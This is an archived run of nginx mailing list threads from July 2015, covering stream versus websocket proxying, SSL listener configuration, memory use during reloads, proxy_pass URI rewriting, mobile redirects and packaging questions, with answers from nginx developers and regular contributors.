As already suggested on the Russian mailing list, please try
without 3rd party modules.

(Note well that cross-posting isn't really a good idea.)

[...]

-- 
Maxim Dounin
http://nginx.org/

From mdounin at mdounin.ru Sat Jul 4 05:20:33 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Sat, 4 Jul 2015 08:20:33 +0300
Subject: websocket causes "client sent invalid method ..."
In-Reply-To:
References:
Message-ID: <20150704052033.GD74913@mdounin.ru>

Hello!

On Tue, Jun 30, 2015 at 11:08:36PM -0400, snagytx wrote:

> Hello,
>
> I'm trying setup nginx for socket proxy. I was able to find that nginx can
> be configured to proxy websockets and added an error log file in the server
> configuration block to isolate the messages, and I get:
>
> client sent invalid method while reading client request line, client:
> XX.XX.XX.1, server: , request: ?b??"
>
> in the access logs I see:
>
> XX.XX.XX.1 - - [30/Jun/2015:17:39:15 -0400]
> "\x00\x08\x1B\x19\x94\xD2\x81b\xBD\xF3" 400 172 "-" "-" "-"
>
> The software that is I need to proxy is a remote assistant application with
> a web servlet running inside tomcat and with two client applications, one
> admin and one user, that connect to the server and communicate.
> > Is there anything that can be done to make it work? The "websocket proxy" is something completely different from what you are looking for. It's to proxy the Websocket protocol connections - that is, to proxy HTTP/1.1 requests with protocol upgrade. To proxy arbitrary stream sockets, use the stream module. See here for details: http://nginx.org/en/docs/stream/ngx_stream_core_module.html Note that it's only available in nginx 1.9.x. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Sat Jul 4 05:48:22 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 08:48:22 +0300 Subject: trac.nginx.org incorrect https In-Reply-To: References: Message-ID: <20150704054822.GE74913@mdounin.ru> Hello! On Thu, Jun 25, 2015 at 06:16:42PM +0900, Edho Arief wrote: > I noticed that trac.nginx.org has https/SNI configured for the host > but no actual ssl configuration (how do you even do that): The trac.nginx.org domain isn't available via https. The IP address trac.nginx.org maps to does have other sites answering on https/SNI though, and to avoid sending invalid certificate the "ssl_ciphers aNULL;" is used in the default server configuration. This is what causes the message you see. > $ openssl s_client -connect trac.nginx.org:443 -servername trac.nginx.org > CONNECTED(00000003) > 140010415498912:error:14077410:SSL > routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake > failure:s23_clnt.c:770: > --- > no peer certificate available > --- > No client certificate CA names sent > --- > SSL handshake has read 7 bytes and written 318 bytes > --- > New, (NONE), Cipher is (NONE) > Secure Renegotiation IS NOT supported > Compression: NONE > Expansion: NONE > --- JFYI: You can use something like $ openssl s_client -connect trac.nginx.org:443 -servername trac.nginx.org -cipher aNULL to establish a connection. (Requests won't work though, as the same server also have "return 444;" in the configuration.) 
> Relevant (which is how I noticed it in the first place): > > https://github.com/EFForg/https-everywhere/pull/1993 When people try to use something they weren't asked to, it strikes back. -- Maxim Dounin http://nginx.org/ From me at myconan.net Sat Jul 4 05:57:44 2015 From: me at myconan.net (Edho Arief) Date: Sat, 4 Jul 2015 14:57:44 +0900 Subject: trac.nginx.org incorrect https In-Reply-To: <20150704054822.GE74913@mdounin.ru> References: <20150704054822.GE74913@mdounin.ru> Message-ID: On Sat, Jul 4, 2015 at 2:48 PM, Maxim Dounin wrote: > Hello! > > On Thu, Jun 25, 2015 at 06:16:42PM +0900, Edho Arief wrote: > >> I noticed that trac.nginx.org has https/SNI configured for the host >> but no actual ssl configuration (how do you even do that): > > The trac.nginx.org domain isn't available via https. > > The IP address trac.nginx.org maps to does have other sites > answering on https/SNI though, and to avoid sending invalid > certificate the "ssl_ciphers aNULL;" is used in the default server > configuration. This is what causes the message you see. > > >> Relevant (which is how I noticed it in the first place): >> >> https://github.com/EFForg/https-everywhere/pull/1993 > > When people try to use something they weren't asked to, it > strikes back. > Whoever added it probably didn't actually try accessing the site. It has been removed. Thanks. From mdounin at mdounin.ru Sat Jul 4 06:04:51 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 09:04:51 +0300 Subject: High load due to reload In-Reply-To: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> Message-ID: <20150704060451.GF74913@mdounin.ru> Hello! On Tue, Jun 23, 2015 at 11:14:44AM +0200, 5hosting GmbH wrote: > I have a small problem with a nginx system that acts as a loadbalancing > proxy. We do have lots of vhosts and ssl certificates and each time we do a > /etc/init.d/nginx reload, the load of our server goes up to 20 due to > swapping. 
> > Is there any other way to reload nginx to get aware of ssl or vhost changes > without getting high loads? When reloading a configuration, nginx reads a new configuration and starts new worker process, and then asks old worker processes to terminate gracefully. See this link for a detailed description: http://nginx.org/en/docs/control.html#reconfiguration This basically means that during configuration reload nginx memory consumption grows up for a while (and roughly doubles in some cases). You should tune your system appropriately to make sure there are enough memory to start new worker processes without swapping. In particular, if most of the memory is used for nginx buffers (proxy_buffers, proxy_buffer_size, and so on), tuning these buffers usually is enough. -- Maxim Dounin http://nginx.org/ From shay at peretz.in Sat Jul 4 06:42:06 2015 From: shay at peretz.in (Shay Peretz) Date: Sat, 4 Jul 2015 09:42:06 +0300 Subject: DNS cache in nginx Message-ID: Hello , I have an A record which resolve to 2 CNAME's , the DNS failover will make the switch if something go wrong . The problem is that after a change the nginx stick to the OLD IP unless I reload it .. any way the Caching can be disabled ? I tried the following with no success : add valid for the resolver , resolver 8.8.8.8 valid=5s; and or resolver_timeout 1s; Any recommendation to solve it ? -- shay From mdounin at mdounin.ru Sat Jul 4 06:47:07 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 09:47:07 +0300 Subject: SSL on/off on same port and IP In-Reply-To: <5589708B.9020607@der-ingo.de> References: <5589708B.9020607@der-ingo.de> Message-ID: <20150704064707.GG74913@mdounin.ru> Hello! 
On Tue, Jun 23, 2015 at 04:43:23PM +0200, Ingo Lafrenz wrote:

> Hi,
>
> consider the following very simple nginx config:
> http {
>     server {
>         listen 127.0.0.1:123;
>         server_name abc;
>     }
>     server {
>         listen 127.0.0.1:123 ssl;
>         server_name xyz;
>         ssl_certificate...;
>     }
> }
>
> In words:
> I instruct nginx to listen on the same port and IP, one time without ssl,
> one time with ssl. IMHO this is a broken config, however nginx accepts it.
>
> What would you say? Should nginx reject such a config? Right now you only
> get an error at request time.

The "listen 127.0.0.1:123 ssl;" means that nginx will use SSL on the 127.0.0.1:123 listen socket. This works much like with any listen socket options: you may specify them once, and omit in other server{} blocks.

The only problem with the config in question is that there is no ssl certificate defined in the first server. There is a ticket about complaining during configuration testing in such a case:

http://trac.nginx.org/nginx/ticket/178

But adding such a check isn't trivial and unlikely to happen soon.

> It gets even worse, if the 2nd server is configured with the ssl directive
> instead of "listen ssl":
> server {
>     listen 127.0.0.1:123;
>     server_name xyz;
>     ssl on;
>     ssl_certificate...;
> }
>
> In that case you don't even see an error in the logs anymore and clients
> can't connect via https anymore.

There will be an error in the logs, but at the "info" level - and therefore rarely seen. The socket in question won't have SSL enabled as there is no "ssl on" in the default (first) server, and therefore nginx will not expect SSL connections and will complain that "client sent invalid method" for all attempts to establish an SSL connection.

Anyway, that's why "ssl on" is deprecated - it's very easy to configure things wrongly when using it.

-- Maxim Dounin http://nginx.org/ From francis at daoine.org Sat Jul 4 10:14:10 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Jul 2015 11:14:10 +0100 Subject: Nginx support fot Weedfs !! In-Reply-To: References: Message-ID: <20150704101410.GQ23844@daoine.org> On Thu, Jun 25, 2015 at 04:17:19AM +0500, shahzaib shahzaib wrote: Hi there, I've read your mail, and I am not sure what your planned architecture is -- as in, at what point do you want nginx to be used. > Currently, weedfs > default webserver is being used as HTTP but it would be better to have > nginx webserver on volume servers for its low foot prints, stability and > robust response time for static .jpg files. > > So we need to know if we can use nginx with weedFS ? If you want to replace the weed volume server (which exposes a http interface to clients) with the nginx http server, then you will probably need to reimplement whatever it is that the weed volume server does that nginx does not do. Or you could try to use nginx for some of what the weed volume server does, and implement some way of "passing off" the rest of what the weed volume server does, to the weed volume server. Either way, you'll probably need to arrange for code to be written. If you want the browser to make a request of nginx, and then have nginx fetch the content from the weedfs service, then you will need a weedfs client available within nginx. That should be doable, but will take some coding since it does not exist in stock nginx. > Following is the > github we found, but need to confirm if it will fulfill our needs ? > > https://github.com/medcl/lua-resty-weedfs That does not look like a complete weedfs client to me; but it may be enough for your needs, depending on what exactly your needs are. It shouldn't be too difficult to set up a small test to see that it does do what you want, at the speed you want. 
If you can describe your intended data flow -- starting with something like "the browser will get *this* url which has *this* content" -- then it may be clearer what you are trying to achieve. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Sat Jul 4 18:03:47 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sat, 04 Jul 2015 14:03:47 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150703174730.GP23844@daoine.org> References: <20150703174730.GP23844@daoine.org> Message-ID: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> Hi there thanks for the help i run the following : curl -A iPad -i http://www.domain.com/#!/pt/--item/pt/32516/Farinha and the result was : -bash: !/pt/--item/pt/32516/Farinha : event not found But this page exist's and is running in desktop in a pc Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260055#msg-260055 From nginx-forum at nginx.us Sat Jul 4 18:20:52 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sat, 04 Jul 2015 14:20:52 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7bff838604130226b01bf97d3c03d475.NginxMailingListEnglish@forum.nginx.org> Hi there thanks for the help there was an erro not "-bash: !/pt/--item/pt/32516/Farinha : event not found" but " -bash: "#!/pt/--item/pt/32516/Farinha : event not found Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260056#msg-260056 From francis at daoine.org Sat Jul 4 18:35:28 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Jul 2015 19:35:28 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org> 
References: <20150703174730.GP23844@daoine.org> <7a3cad6e06acf76aa8f01b6a8134897b.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150704183528.GR23844@daoine.org>

On Sat, Jul 04, 2015 at 02:03:47PM -0400, ramsoft75 wrote:

Hi there,

> i run the following :
>
> curl -A iPad -i http://www.domain.com/#!/pt/--item/pt/32516/Farinha
>
> and the result was :
>
> -bash: !/pt/--item/pt/32516/Farinha : event not found

A few things here:

"!" is special to bash, so you have to shell-escape it for "curl" to see it.

"#" is special in a url; it is not part of the normalised variable $uri.

Possibly using $request_uri instead of $uri in your configuration will be appropriate? They are different variables with different values, so there are probably some cases where using one will break things. Since you are using it in a redirect, probably $request_uri is the correct one to use regardless.

f
-- 
Francis Daly        francis at daoine.org

From philipp.kraus at tu-clausthal.de Sat Jul 4 18:38:06 2015
From: philipp.kraus at tu-clausthal.de (Philipp Kraus)
Date: Sat, 4 Jul 2015 20:38:06 +0200
Subject: rewrite URL
Message-ID: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de>

Hello,

I try to use Nginx as a proxy (for SSL) on a Jetty server. The Jetty application should be accessed by a subdirectory of my Nginx. I have setup this location configuration:

location /myapp {

    proxy_pass http://localhost:8112;

    proxy_set_header X-Forwarded-Host $http_host;
    proxy_set_header X-Forwarded-Proto $scheme;
    #proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    client_max_body_size 650M;

}

The Jetty server runs under http://localhost:8112, if I change the "location /myapp" to "location /" everything works fine. The Jetty server returns URLs with the base URL /, so on this configuration CSS / JSS files are not found.
How can I rewrite the URLs, so that all files are found within the directory /myapp ?

Thanks

Phil

From cnst++ at FreeBSD.org Sat Jul 4 18:53:31 2015
From: cnst++ at FreeBSD.org (Constantine A. Murenin)
Date: Sat, 04 Jul 2015 11:53:31 -0700
Subject: rewrite URL
In-Reply-To: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de>
References: <917E4A5F-F4DD-4C0A-A9F4-903AA5D9405C@tu-clausthal.de>
Message-ID: <55982BAB.9070800@FreeBSD.org>

On 2015-07-04 11:38, Philipp Kraus wrote:
> Hello,
>
> I try to use Nginx as a proxy (for SSL) on a Jetty server. The Jetty application should be accessed by a subdirectory of my Nginx. I have setup this location configuration:
>
> location /myapp {
>
>     proxy_pass http://localhost:8112;
>
>     proxy_set_header X-Forwarded-Host $http_host;
>     proxy_set_header X-Forwarded-Proto $scheme;
>     #proxy_set_header X-Real-IP $remote_addr;
>     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
>     proxy_http_version 1.1;
>     proxy_set_header Upgrade $http_upgrade;
>     proxy_set_header Connection "upgrade";
>     client_max_body_size 650M;
>
> }
>
> The Jetty server runs under http://localhost:8112, if I change the "location /myapp" to "location /" everything works fine. The Jetty server returns URLs with the base URL /, so on this configuration CSS / JSS files are not found.
> How can I rewrite the URLs, so that all files are found within the directory /myapp ?
>
> Thanks
>
> Phil

Hi Phil,

You should specify a URI (e.g., a trailing slash) in the URL specified by the proxy_pass directive:

> location /myapp {
>
>     proxy_pass http://localhost:8112/;
...

See http://nginx.org/r/proxy_pass for more info.

Cheers,
Constantine.

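An added illustration of the proxy_pass rule referred to above (not part of either message, and not nginx's own code): a simplified Python model of which URI reaches the backend for a prefix location, with and without a URI part in proxy_pass. It assumes plain prefix locations and no variables in proxy_pass, skips nginx's URI normalisation, and also tries `location /myapp/`, which does not appear in the thread; the function names and sample requests are constructed.

```python
from urllib.parse import urlsplit


def upstream_uri(location_prefix, proxy_pass, request_uri):
    """Model the URI nginx sends upstream for a prefix location.

    Returns None when the prefix location does not match the request.
    Simplifications (assumptions of this sketch): plain prefix locations only,
    no variables in proxy_pass, no URI normalisation or re-escaping.
    """
    path, sep, query = request_uri.partition("?")
    if not path.startswith(location_prefix):
        # For a slash-terminated location handled by proxy_pass, nginx answers
        # a request for the prefix without its trailing slash with a 301 to
        # the slash-terminated form; this model only reports "no match".
        return None
    # URI part of proxy_pass: everything after scheme://host[:port].
    replacement = urlsplit(proxy_pass).path
    if replacement == "":
        # No URI part: the request URI is passed on unchanged.
        return request_uri
    # URI part present: the matched location prefix is replaced by it.
    return replacement + path[len(location_prefix):] + sep + query


# Host and port are the ones from the thread; everything else is constructed.
CONFIGS = [
    ("/myapp", "http://localhost:8112"),    # configuration as first posted
    ("/myapp", "http://localhost:8112/"),   # with the suggested URI part
    ("/myapp/", "http://localhost:8112/"),  # both slash-terminated (assumption)
]
REQUESTS = [
    "/myapp",
    "/myapp/",
    "/myapp/css/site.css?v=3",
    "/myapplication/x",  # a different path that shares the string prefix
]


def mapping_table():
    """Map every (location, proxy_pass, request) triple to the upstream URI."""
    return {
        (loc, target, req): upstream_uri(loc, target, req)
        for loc, target in CONFIGS
        for req in REQUESTS
    }


if __name__ == "__main__":
    for (loc, target, req), sent in mapping_table().items():
        shown = sent if sent is not None else "(location does not match)"
        print(f"location {loc:8} proxy_pass {target:23} {req:26} -> {shown}")
```

With `location /myapp` the prefix also matches `/myapplication/x`, and replacing the prefix with `/` yields a double slash in front of the remaining path; terminating both the location and the proxy_pass URI with a slash avoids both effects.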
From nginx-forum at nginx.us Sun Jul 5 19:31:22 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Sun, 05 Jul 2015 15:31:22 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150703174730.GP23844@daoine.org> References: <20150703174730.GP23844@daoine.org> Message-ID: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> Hi there I changed to #to detect if the device with www entered in domain is mobile if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^ http://m.domain.com$request_uri; } I executed the command : $ curl -A iPad -i https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J And the result was : -bash: !/pt/--item-view/pt/32081/Mix-J: event not found This only append's with Safari, there's no problem with Chrome (Desktop, Mobile) or Internet Explorer in Pc, could this be a browser problem and not an Nginx configuration problem ? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260064#msg-260064 From nginx-forum at nginx.us Sun Jul 5 20:24:19 2015 From: nginx-forum at nginx.us (xfeep) Date: Sun, 05 Jul 2015 16:24:19 -0400 Subject: [ANN] Nginx-Clojure v0.4.0 Release! Message-ID: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org> 0.4.0 (2015-07-06) New Feature: Server Side Websocket (issue #73) New Feature: A build-in Jersey container to support java standard RESTful web services (JAX-RS 2.0) (issue #74) New Feature: Tomcat 8 embedding support (so servlet 3.1/jsp/sendfile/JSR-356 websocket work within nginx!) 
(issue #67) New Feature: Coroutined Based Client Socket Supports to Bind to Specified IP Address (issue #69) New Feature: Handler's Property Configuration (issue #66) Enhancement: NginxHttpServerChannel can work with Rewrite Handler or Access Handler (issue #79) Enhancement: Configurable Write Buffer Size for SSE or Websocket (issue #76) Bug Fix: When we do not configure jvm_path proxy_pass will not work (issue #72) Bug Fix: nginx worker restart when get the value of header X-Forwarded-For (issue #70) Bug Fix: proxy_cache_path causes crash (issue #64) Bug Fix: send_timeout does not take effect with NginxHttpServerChannel (issue #78) Bug Fix: Waving tool generates wrong wave information of fuzzing classes (issue #80) Documents : Release History link in README (issue #68) Binaries Distribution: built with The latest stable Nginx v1.8.0 which released at 2015-04-21. Binaries of Releases (for linux, windows and macosx) http://sourceforge.net/projects/nginx-clojure/files/. Freebsd users can get old v0.3.0 from https://www.freshports.org/www/nginx . Sources of Releases https://github.com/nginx-clojure/nginx-clojure/releases website : http://nginx-clojure.github.io/ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260065,260065#msg-260065 From mdounin at mdounin.ru Sun Jul 5 23:43:26 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 6 Jul 2015 02:43:26 +0300 Subject: OCSP stapling for client certificates In-Reply-To: References: <20140827165554.GW1849@mdounin.ru> Message-ID: <20150705234326.GA1656@mdounin.ru> Hello! On Sun, Jun 28, 2015 at 12:20:06PM -0400, prozit wrote: > Actually, I had the same questions. > Is this something that's available by now, or is it in the pipeline of any > new release of Nginx or will it never be? > > I'm just asking since I believe this might be a good feature to add since > CRL's could get very big when lots of certificate have been revoked, and > since it is not a realtime updating mechanism. 
>
> By using a OCSP, there is a little overhead of contacting the OCSP for
> checking each client certificate that is being validated...
> I believe this to be much more efficient than regularly
> downloading/uploading a CRL and reloading Nginx. This process can fail on
> multiple locations which makes it harder to track and a big disadvantage of
> the CRL's is that they are not realtime updated, which is the case for
> OCSP's.
> This way revoking a certificate will cause it to immediately retract the
> access to client certificate secured applications (for all new sessions).
>
> Is it already supported in some version of Nginx or is it planned somewhere
> in the future?

As of now, there are no plans to support OCSP-based validation of client certificates.

-- 
Maxim Dounin
http://nginx.org/

From office at 5hosting.com Mon Jul 6 06:45:53 2015
From: office at 5hosting.com (5hosting GmbH)
Date: Mon, 6 Jul 2015 08:45:53 +0200
Subject: AW: High load due to reload
In-Reply-To: <20150704060451.GF74913@mdounin.ru>
References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> <20150704060451.GF74913@mdounin.ru>
Message-ID: <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com>

Hi Maxim,

thanks for your explanation. Is there a formula we can use to calculate the amount of RAM needed in a reload scenario?

Thanks,
Jürgen

-----Original Message-----
From: nginx-bounces at nginx.org [mailto:nginx-bounces at nginx.org] On Behalf Of Maxim Dounin
Sent: Saturday, 04 July 2015 08:05
To: nginx at nginx.org
Subject: Re: High load due to reload

Hello!

On Tue, Jun 23, 2015 at 11:14:44AM +0200, 5hosting GmbH wrote:

> I have a small problem with a nginx system that acts as a
> loadbalancing proxy. We do have lots of vhosts and ssl certificates
> and each time we do a /etc/init.d/nginx reload, the load of our server
> goes up to 20 due to swapping.
>
> Is there any other way to reload nginx to get aware of ssl or vhost
> changes without getting high loads?

When reloading a configuration, nginx reads a new configuration and starts new worker process, and then asks old worker processes to terminate gracefully. See this link for a detailed description:

http://nginx.org/en/docs/control.html#reconfiguration

This basically means that during configuration reload nginx memory consumption grows up for a while (and roughly doubles in some cases). You should tune your system appropriately to make sure there are enough memory to start new worker processes without swapping. In particular, if most of the memory is used for nginx buffers (proxy_buffers, proxy_buffer_size, and so on), tuning these buffers usually is enough.

-- 
Maxim Dounin
http://nginx.org/

From Sebastian.Stabbert at heg.com Mon Jul 6 08:37:48 2015
From: Sebastian.Stabbert at heg.com (Sebastian Stabbert)
Date: Mon, 6 Jul 2015 10:37:48 +0200
Subject: Debian Packages from nginx.org
Message-ID: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com>

Hey Guys,

the Debian package for latest stable nginx contains a logrotate.d file with following contents:
"create 640 nginx adm"

However, the package does not create a user "debian" and the user does not exist in Debian by default.
I'd say this is a bug - however I'm not able to login to TRAC, I rather get a "502" or a message telling me that google does not support OpenID2.0.

How do you handle this issue, I think I'm not the only one running into it?

Cheers,
Sebastian

-- 
Sebastian Stabbert
System administrator

Host Europe GmbH is a company of HEG

E-Mail: sebastian.stabbert at heg.com
Phone: +49 2203 1045-7362

-----------------------------------------------------------------------
Host Europe GmbH - http://www.hosteurope.de
Welserstraße 14 - 51149 Köln - Germany
HRB 28495 Amtsgericht Köln
Managing directors: Dr. Claus Boyens, Tobias Mohr

From nginx-forum at nginx.us Mon Jul 6 08:52:51 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Mon, 06 Jul 2015 04:52:51 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <20150703174730.GP23844@daoine.org>
References: <20150703174730.GP23844@daoine.org>
Message-ID: <184471beffdcce59ac0cd9ea7bc43792.NginxMailingListEnglish@forum.nginx.org>

Good day

There was a problem in testing in the terminal with the character "!", it should be with "\" after, like this :

$ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok-Vintage

And the result was :

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 06 Jul 2015 08:50:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://m.alpha.centroproduto.com/

301 Moved Permanently

301 Moved Permanently


nginx
And in this case I changed the nginx configuration to :

if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
    rewrite ^/$ http://m.domain.com/$1 permanent;
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260071#msg-260071

From sb at nginx.com Mon Jul 6 09:35:03 2015
From: sb at nginx.com (Sergey Budnevitch)
Date: Mon, 6 Jul 2015 12:35:03 +0300
Subject: Debian Packages from nginx.org
In-Reply-To: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com>
References: <837A38DF-515C-4F8D-A74A-8288D5D3C8B3@heg.com>
Message-ID: <0B6C784E-F5BA-480A-B7BA-A541173787E1@nginx.com>

> On 06 Jul 2015, at 11:37, Sebastian Stabbert wrote:
>
> Hey Guys,
>
> the Debian package for latest stable nginx contains a logrotate.d file with following contents:
> "create 640 nginx adm"

Yes, nginx package creates user nginx, while adm is a system group.

>
> However, the package does not create a user "debian" and the user does not exist in Debian by default.

I do not see user debian in the nginx package, what are you talking about?

> I'd say this is a bug - however I'm not able to login to TRAC, I rather get a "502" or a message telling me that google does not support OpenID2.0.
>
> How do you handle this issue, I think I'm not the only one running into it?
>
> Cheers,
> Sebastian
>
> --
> Sebastian Stabbert
> System administrator
>
> Host Europe GmbH is a company of HEG
>
> E-Mail: sebastian.stabbert at heg.com
> Phone: +49 2203 1045-7362
>
> -----------------------------------------------------------------------
> Host Europe GmbH - http://www.hosteurope.de
> Welserstraße 14 - 51149 Köln - Germany
> HRB 28495 Amtsgericht Köln
> Managing directors: Dr.
Claus Boyens, Tobias Mohr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Mon Jul 6 12:22:07 2015 From: francis at daoine.org (Francis Daly) Date: Mon, 6 Jul 2015 13:22:07 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150706122207.GS23844@daoine.org> On Sun, Jul 05, 2015 at 03:31:22PM -0400, ramsoft75 wrote: Hi there > This only append's with Safari, there's no problem with Chrome (Desktop, > Mobile) or Internet Explorer in Pc, could this be a browser problem and not > an Nginx configuration problem ? For one request that gets the response you expect, what does access.log say that the request and user-agent are? For one request that does not get the response you expect, what does access.log say that the request and user-agent are? Perhaps that will hint at where the problem is. f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Mon Jul 6 12:36:45 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 6 Jul 2015 15:36:45 +0300 Subject: High load due to reload In-Reply-To: <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com> References: <011201d0ad95$0b79ac00$226d0400$@5hosting.com> <20150704060451.GF74913@mdounin.ru> <00cd01d0b7b7$67b68f20$3723ad60$@5hosting.com> Message-ID: <20150706123645.GD1656@mdounin.ru> Hello! On Mon, Jul 06, 2015 at 08:45:53AM +0200, 5hosting GmbH wrote: > thanks for your explanation. Is there a formula we can use to calculate the > amount of RAM needed in a reload scenario? As previously suggested, nginx memory consumption during a reload may be doubled compared to normal operations - because there will be twice as much worker processes. 
Having at least the same amount of memory as normally occupied by nginx worker processes (excluding shared memory zones) in (free + inactive) is usually good enough to ensure seamless reloads. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Jul 6 13:01:49 2015 From: nginx-forum at nginx.us (snagytx) Date: Mon, 06 Jul 2015 09:01:49 -0400 Subject: websocket causes "client sent invalid method ..." In-Reply-To: <20150704052033.GD74913@mdounin.ru> References: <20150704052033.GD74913@mdounin.ru> Message-ID: <2588d760d015c9421baba5972839de8f.NginxMailingListEnglish@forum.nginx.org> Thank you. As a temporary solution I used port-forwarding at the firewall level, it doesn't do load balancing but I don't need it for now. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260007,260083#msg-260083 From nginx-forum at nginx.us Mon Jul 6 13:41:02 2015 From: nginx-forum at nginx.us (xnirchan) Date: Mon, 06 Jul 2015 09:41:02 -0400 Subject: stub_status newrelic plugin Message-ID: <4be687087c4bf083ffc65209339a26af.NginxMailingListEnglish@forum.nginx.org> Hello nginx experts, I wonder how nginx generate the server status by stub_status directive. I have set several virtual host on single server and I put the several nginx server behind load balancer. I have 2 questions: 1. does stub_status show difference results between virtual hosts in one server or actually this status report is for whole server, regardless its virtual host? 2. what if I put several server behind load balancer, is it still relevant to single server (shown randomly depend on load balancer) or they can be separated per server? Currently I am using newrelic plugin and the report seems separated, I am not pretty sure if this report is accurate to the respective server or it is just random report based on stub_status accessed by the agent. thank you for your time and answer. 
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260085,260085#msg-260085 From nginx-forum at nginx.us Mon Jul 6 13:49:35 2015 From: nginx-forum at nginx.us (sz_g) Date: Mon, 06 Jul 2015 09:49:35 -0400 Subject: proxy_cache_key with variables Message-ID: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> I've just created a configuration composed of two servers. Both just forwards traffic from different ports (and protocols) to different servers, and keep responses in cache. It works nice. For both servers "GET /" request is sent, in the response there is proper resource. Thus (to distinguish responses in the cache) I added for both cache_key: proxy_cache_key "$upstream_addr*$request"; But it doesn't work. I found that upstream states are not available and thus "proxied" address is not known when cache key is computed. And "proxied" address is computed only when additional stream must be used.. Is there any way to get proper key? Or any other way to keep all copies in the cache? I plan to add "load balancing" module, which would be able to forward request on (multiple) source addresses to multiple proxied addresses, with caching.. Will it work properly? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260086#msg-260086 From nginx-forum at nginx.us Mon Jul 6 14:05:31 2015 From: nginx-forum at nginx.us (xnirchan) Date: Mon, 06 Jul 2015 10:05:31 -0400 Subject: proxy_cache_key with variables In-Reply-To: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> References: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, >>proxy_cache_key "$upstream_addr*$request"; I am not sure that you are using the correct format for proxy_cache_key directive. my I know what is the wildcard char "*" doing out there, between $upstream_addr and $request? 
